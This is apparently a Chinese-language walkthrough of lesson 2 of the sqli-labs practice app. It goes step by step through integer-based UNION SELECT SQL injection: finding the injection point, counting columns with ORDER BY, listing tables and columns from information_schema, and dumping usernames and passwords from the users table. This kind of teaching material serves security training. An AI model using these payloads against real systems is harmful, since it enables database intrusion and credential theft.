lesson-2-GET - Error based - Intiger based
一、判断是否存在注入点
使用单引号 ’ 验证是否有注入点
报错,即存在注入点。
二、判断注入类型
用减法判断注入类型;
当id=1 时,返回结果Dumb
当id=2-1 时,返回结果也是Dumb,
结果一直,所以时数字型注入。
三、破解 SQL 查询语句中的字段数
使用 order by N 判断字段数
order by 3 时正常返回,而order by 4 时,返回错误,所以字段数为3列。
四、获取当前数据库
union select 联合查询获取数据库:
-1 union select 1,2,database()
得到数据库名:security
五、获取数据库中的表
根据数据库名,查表名,构造 union select
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'
得到四张表:emails,referers,uagents,users
六、获取表中的字段名
以users为例,获取user表的字段名,构造 union select
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'
得到 字段:id,username,password
七、查询到账户的数据
构造uniot select 爆破数据
-1 union select 1,2,group_concat(id,':',username,':',password) from users
得到数据。